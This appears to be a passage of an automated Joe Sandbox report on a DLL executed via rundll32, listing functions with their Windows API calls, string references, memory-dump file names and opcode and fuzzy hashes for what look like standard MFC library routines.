Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
String ID:
API String ID: 63617653-0
Opcode ID: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
Instruction ID: 8f7f5911e4d3fd52506e0ebb541b856e7b36a578254e0be009e80c36fe1d785e
Opcode Fuzzy Hash: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
Instruction Fuzzy Hash: 13F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1002D1E9 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222

Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0

_memset.LIBCMT ref: 1002D2F2
VariantClear.OLEAUT32(?), ref: 1002D3D1

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID:
API String ID: 4021759052-0
Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1002D5D0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1002D5FF
SysAllocString.OLEAUT32(00000000), ref: 1002D650
SysAllocString.OLEAUT32(00000000), ref: 1002D674

Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0

SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
SysAllocString.OLEAUT32(00000000), ref: 1002D724

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocString$H_prolog3_memset
String ID:
API String ID: 842698744-0
Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55

Uniqueness

Uniqueness Score: -1.00%

Function 100169E1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0

EnableWindow.USER32(?,00000001), ref: 10016A2E
GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
GetCurrentProcessId.KERNEL32 ref: 10016A46
SendMessageA.USER32 ref: 10016A5B
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
EnableWindow.USER32(?,00000001), ref: 10016B14

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
Instruction ID: f13ef48dc5fb0c484cec2fa7b3f992f2dc6d3b1b42596072abe369902371925a
Opcode Fuzzy Hash: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
Instruction Fuzzy Hash: 3B415B72A00258DBEB20CFA4CC81BDD76A8EF09350F614119E949AB281E770D9848F52

Uniqueness

Uniqueness Score: -1.00%

Function 10016936 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
GetParent.USER32(100010EC), ref: 10016976
GetParent.USER32(100010EC), ref: 10016989
GetLastActivePopup.USER32(100010EC), ref: 10016998
IsWindowEnabled.USER32(100010EC), ref: 100169AD
EnableWindow.USER32(100010EC,00000000), ref: 100169C0

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696

Uniqueness

Uniqueness Score: -1.00%

Function 10020559 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 10020568
GetDlgCtrlID.USER32 ref: 1002057C
GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
GetWindowRect.USER32 ref: 1002059C
PtInRect.USER32(?,?,?), ref: 100205AC
GetWindow.USER32(?,00000005), ref: 100205B9

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99

Uniqueness

Uniqueness Score: -1.00%

Function 1001D992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1001D9C0

Strings

@, xrefs: 1001DACC
AfxMDIFrame80s, xrefs: 1001DA61
@, xrefs: 1001DB65
AfxFrameOrView80s, xrefs: 1001DA86

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10021D88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 10021DB2
lstrlenA.KERNEL32(?), ref: 10021DFA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14

Strings

System, xrefs: 10021DAE

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
Instruction ID: 0e81d0f59cd66082c3aa20aff96d3ec22f48ed16ea157d431ad3d5bc96dc32b7
Opcode Fuzzy Hash: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
Instruction Fuzzy Hash: B441C275900215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100233C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 100233CB
GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6

Strings

MFCM80ReleaseManagedReferences, xrefs: 100234A0
mfcm80.dll, xrefs: 10023485

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressH_prolog3_HandleModuleProc
String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
API String ID: 2418878492-2500072749
Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 10015723 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1001573B
_memset.LIBCMT ref: 1001579D
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
LoadBitmapA.USER32 ref: 10015807

Strings

, xrefs: 1001575C

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
Instruction ID: fd313e63bbbbf4de8925541e866d87c57cd6a5f11e69b9eb671f3de319ba3105
Opcode Fuzzy Hash: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
Instruction Fuzzy Hash: 2831C072A00216DFEB10CF78DDCAAAE7BB5EB44645F15052AE506EF2C1E631E9448750

Uniqueness

Uniqueness Score: -1.00%

Function 10023B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10023B2B
GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19

Strings

, xrefs: 10023B8A

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
String ID:
API String ID: 2429671754-3916222277
Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11

Uniqueness

Uniqueness Score: -1.00%

Function 10018D05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
GetSystemMetrics.USER32 ref: 10018D5B
GetSystemMetrics.USER32 ref: 10018D62

Strings

DISPLAY, xrefs: 10018D7F
B, xrefs: 10018D22

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 10016D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

Edit, xrefs: 10016DBA

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666

Uniqueness

Uniqueness Score: -1.00%

Function 10023C5A Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10023C61
SendMessageA.USER32 ref: 10023CD9
GetBkColor.GDI32(?), ref: 10023CE2
GetTextColor.GDI32(?), ref: 10023CEE
GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Color$H_prolog3LocaleMessageSendTextThread
String ID:
API String ID: 187318432-0
Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10016461 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10016480
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
RegCloseKey.ADVAPI32(?), ref: 10016543

Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
String ID:
API String ID: 69039007-0
Opcode ID: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
Instruction ID: 2ee7fd04e7e526f2a2658ba16ac7fadb449e12f7dad9b6db0157347413a913f7
Opcode Fuzzy Hash: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
Instruction Fuzzy Hash: 3A21D075D0025ADBDB21CB94CC416EEB7B0EF08350F10412AED41AB290EB30AE84DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1002B3A9 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?), ref: 1002B3B9
GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC

Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9

MulDiv.KERNEL32 ref: 1002B420
MulDiv.KERNEL32 ref: 1002B42B

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002B437 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?), ref: 1002B447
GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A

Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40

MulDiv.KERNEL32 ref: 1002B4AE
MulDiv.KERNEL32 ref: 1002B4B9

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90

Uniqueness

Uniqueness Score: -1.00%

